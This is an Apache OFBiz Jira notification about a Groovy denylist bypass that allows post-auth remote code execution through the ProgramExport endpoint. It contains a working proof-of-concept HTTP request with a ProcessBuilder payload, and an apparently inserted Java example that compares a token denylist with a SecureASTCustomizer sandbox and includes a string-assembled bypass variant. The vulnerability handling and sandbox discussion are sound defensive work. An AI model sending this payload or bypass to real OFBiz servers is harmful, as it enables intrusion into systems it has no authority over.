[
https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490786#comment-17490786
]
Jacques Le Roux edited comment on OFBIZ-12571 at 2/11/22, 9:42 AM:
-------------------------------------------------------------------
Hi Y4er,
We already had the recommendation about Groovy sandbox by thiscodecc at
OFBIZ-12305. I had a look and here was then my conclusion:
https://markmail.org/message/iwtvx3i35hbhywy7. I made a typo in the message the
link for Cedric's blog is https://melix.github.io/blog/2015/03/sandboxing.html.
There is more with
https://www.google.fr/search?q=site%3Amelix.github.io+sandbox&ie=UTF-8
I agree that it's impossible to fix the issue (and actually webshell issues at
large) with the denied deniedWebShellTokens. Yesterday browsing
https://github.com/tennc/webshell I added 2 new tokens (not yet committed):
function and class. So for now I'll commit them and will add all other cases
that you can submit here.
Later I'll have a deeper look at Groovy sandbox. I'll not close here before
having done that. It's not a priority because this is a post-auth and we have
received several vulnerability reports that I need to work on before.
TIA for your help
was (Author: jacques.le.roux):
Hi Y4er,
We already had the recommendation about Groovy sandbox by thiscodecc at
OFBIZ-12305. I had a look and here was then my conclusion:
https://markmail.org/message/iwtvx3i35hbhywy7. I made a typo in the message the
link for Cedric's blog is https://melix.github.io/blog/2015/03/sandboxing.html.
There is more with
https://www.google.fr/search?q=site%3Amelix.github.io+sandbox&ie=UTF-8
I agree that it's impossible to fix the issue (and actually webshell issues at
large) with the denied deniedWebShellTokens. Yesterday browsing
https://github.com/tennc/webshell I added 2 new tokens (not yet committed):
function and class. So for now I'll commit them and will add all other cases
that you can submit here.
Later I'll have a deeper look at Groovy sandbox, but it's not a priority
because this is a post-auth and we have received several vulnerability reports
that I need to work on before. I'll not close here before having done that.
TIA for your help
> groovy blacklist bypass cause post-auth RCE from
> webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
> Key: OFBIZ-12571
> URL: https://issues.apache.org/jira/browse/OFBIZ-12571
> Project: OFBiz
> Issue Type: Bug
> Components: framework/webtools
> Affects Versions: 18.12.05
> Environment: ofbiz 18.12.05
> Reporter: Y4er
> Assignee: Jacques Le Roux
> Priority: Major
> Fix For: 18.12.06, 22.01.01
>
> Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from
> webtools/control/ProgramExport
>
> {code}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
>
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29
> {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!
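The comment above contrasts a token denylist (deniedWebShellTokens) with a Groovy sandbox. The following is an added illustration of that difference and is not OFBiz code or anything from this issue: a substring denylist check in the shape of the one the comment describes (the `containsDeniedToken` helper and its token list are assumptions for the example, not the project's implementation) next to a GroovyShell whose compiler is restricted by SecureASTCustomizer to a small allowlist of imports and receiver classes. It assumes Groovy 2.x on the classpath (the same setters exist in 4.x under names such as setAllowedImports, with the old names kept as deprecated aliases). The denylist decides on the source text alone; the customizer rejects a method call at compile time because of the class it is made on, which is why the reported payload and a string-assembled reflective variant are both refused without either spelling having to be anticipated. As Cedric's blog post linked in the comment discusses, an AST customizer is compile-time filtering and is only one layer of a sandbox, not a complete one.

```java
import java.util.Arrays;
import java.util.List;

import groovy.lang.GroovyShell;
import org.codehaus.groovy.control.CompilationFailedException;
import org.codehaus.groovy.control.CompilerConfiguration;
import org.codehaus.groovy.control.customizers.SecureASTCustomizer;

/**
 * Added example, not OFBiz code. Compares a substring denylist with a
 * compile-time allowlist built from SecureASTCustomizer (Groovy 2.x names).
 */
public class GroovyAllowlistDemo {

    /**
     * Hypothetical stand-in for a deniedWebShellTokens style check: a
     * case-insensitive substring match against the script source.
     */
    static boolean containsDeniedToken(String program, List<String> deniedTokens) {
        String lower = program.toLowerCase();
        for (String token : deniedTokens) {
            if (lower.contains(token.toLowerCase())) {
                return true;
            }
        }
        return false;
    }

    /** A shell whose compiler refuses anything outside a small allowlist. */
    static GroovyShell allowlistedShell() {
        SecureASTCustomizer secure = new SecureASTCustomizer();
        // Only these classes may be referenced by name, directly or fully qualified.
        secure.setImportsWhitelist(Arrays.asList("java.lang.Math"));
        secure.setStarImportsWhitelist(Arrays.<String>asList());
        secure.setStaticImportsWhitelist(Arrays.<String>asList());
        secure.setStaticStarImportsWhitelist(Arrays.<String>asList());
        secure.setIndirectImportCheckEnabled(true);
        // Method calls are only allowed on receivers of these types.
        secure.setReceiversClassesWhiteList(Arrays.<Class>asList(
                Integer.class, Long.class, Double.class, String.class, Math.class));
        // No closures, method definitions or package declarations in a one-off script.
        secure.setClosuresAllowed(false);
        secure.setMethodDefinitionAllowed(false);
        secure.setPackageAllowed(false);

        CompilerConfiguration cfg = new CompilerConfiguration();
        cfg.addCompilationCustomizers(secure);
        return new GroovyShell(cfg);
    }

    /** Returns the script result, or null when the customizer rejected it at compile time. */
    static Object runSandboxed(GroovyShell shell, String program) {
        try {
            return shell.evaluate(program);
        } catch (CompilationFailedException e) {
            // SecureASTCustomizer throws SecurityException, surfaced as a compilation failure.
            return null;
        }
    }

    public static void main(String[] args) {
        // Constructed token list for the example; the real one is not on the page.
        List<String> denied = Arrays.asList("ProcessBuilder", "Runtime", "function", "class");

        // The request body from the report, URL-decoded.
        String reported = "ProcessBuilder.newInstance(\"calc\").start()";
        // Constructed variant: the class is named through a concatenated string, so the
        // literal token never appears in the source; only loads the class, runs nothing.
        String indirect = "Class.forName('java.lang.Process' + 'Builder')";
        // Harmless arithmetic on an allowed receiver; evaluates to 21.
        String benign = "Math.max(2, 3) * 7";

        GroovyShell shell = allowlistedShell();
        for (String program : Arrays.asList(reported, indirect, benign)) {
            boolean denylistHit = containsDeniedToken(program, denied);
            Object result = runSandboxed(shell, program);
            System.out.printf("%-50s denylist=%-5s sandbox=%s%n",
                    program, denylistHit, result == null ? "rejected" : "ran -> " + result);
        }
    }
}
```

The denylist catches the two hostile scripts only because their text happens to contain a listed token; every new spelling needs a new token, which is the maintenance problem the comment describes. The customizer rejects both for the same structural reason, a method call on java.lang.ProcessBuilder or java.lang.Class, and lets the arithmetic through, so the policy is stated once as what is permitted rather than grown reactively from webshell samples.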
--
This message was sent by Atlassian Jira
(v8.20.1#820001)